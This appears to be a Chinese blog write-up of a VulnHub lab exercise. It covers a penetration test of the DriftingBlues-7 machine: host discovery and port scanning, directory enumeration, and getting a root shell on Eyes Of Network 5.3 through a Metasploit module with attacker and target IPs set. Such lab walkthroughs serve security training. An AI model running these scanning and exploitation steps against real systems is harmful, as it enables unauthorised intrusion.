对DriftingBlues-7靶机进行渗透测试

目录

环境信息

渗透测试

一、 信息收集

1、打开kali,查看kali的IP地址和子网掩码

2、使用netdiscover扫描主机

3、使用nmap扫描靶机,看有什么服务是可利用的(端口扫描)

4、访问网页,查看基本信息

二、 漏洞查找与利用

1、搜索漏洞

2、msf 模块利用 getshell

参考文章


环境信息

靶机:DriftingBlues-7,IP地址:192.168.52.157

攻击机:Kali,IP地址:192.168.52.134

下载:https://download.vulnhub.com/driftingblues/driftingblues7_vh.ova

渗透测试

一、 信息收集

1、打开kali,查看kali的IP地址和子网掩码

因为靶机和kali现在属于同一个网段,查看kali的IP和子网掩码是为了获得靶机的网段

靶机的网段是:192.168.52.0/24

2、使用netdiscover扫描主机

netdiscover -i eth0 -r 192.168.52.0/24
##netdiscover: -i 指定网卡 -r 指定网段

也可以使用nmap进行主机发现,

nmap -sP 192.168.52.0/24

在使用nmap进行主机发现时,会扫描出本机的IP地址,而netdiscover则不会扫描出本机IP地址

或使用arp-scan -l命令拿到靶机的IP地址

arp-scan -l

 获得靶机靶机ip:192.168.52.157

3、使用nmap扫描靶机,看有什么服务是可利用的(端口扫描)

root@kali:~# nmap -sV -A -p- 192.168.52.157
-sV只扫描端口及其版本号
-A扫描端口的详细信息

 目标靶机开放了22、66、80、111、443、2403、3306以及8086端口

4、访问网页,查看基本信息

使用Firefox插件Wappalyzer,或者扫描网站目录,查看robots.txt等暴露出的信息,可以获取到网站相关信息

使用浏览器插件Wappalyzer,检测网站的CMS,框架,服务器等信息

 Wappalyzer没显示CMS,但从登陆框看到是 Eyes Of Network 网站

利用dirsearch进行网站目录扫描:

dirsearch -u https://192.168.52.157 -e * -i 200
-i 状态码    只显示该状态码
-x 状态码    不显示该状态码

 访问https://192.168.52.157/README.md,获得Eyes Of Network的版本为5.3

访问https://192.168.52.157/bower.json,没有获得其他信息

 使用gobuster工具进行扫描

使用gobuster工具扫描一下66端口,该端口返回的是静态页面

gobuster dir -u http://192.168.52.157:66 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

 使用curl命令查看:http://192.168.52.157:66/index_files/,curl 是常用的命令行工具,用来请求 Web 服务器

curl http://192.168.52.157:66/index_files/

访问http://192.168.52.157:66/eon,发现是个下载链接,kali下载eon文件看看

wget http://192.168.52.157:66/eon

eon文件不知道是什么编码格式,暂时先搁置

使用gobuster工具继续扫描一下66端口下的文件

gobuster dir -u http://192.168.52.157:66 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh

发现了一个/flag.txt,查看一下:

curl http://192.168.52.157:66/flag.txt

 最后,Gobuster工具没有扫描出有价值的目录或者文件

二、 漏洞查找与利用

1、搜索漏洞

kali本地搜索一下漏洞库:searchsploit Eyes Of Network 5.3

2、msf 模块利用 getshell

执行命令进入 msf:msfconsole -q

搜索模块:search Eyes Of Network

使用模块:use 0

show options

设置 kali:set lhost 192.168.52.134

设置攻击目标:set rhosts 192.168.52.157

运行模块:run

 查看 shell 用户:getuid

 发现是 root 用户,直接进入root目录下找到flag

参考文章

靶机渗透练习07-driftingblues7:

靶机渗透练习07-driftingblues7_hirak0的博客-CSDN博客

Vulnhub之Driftingblues 7靶机解题过程:

https://www.cnblogs.com/jason-huawen/p/16909529.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值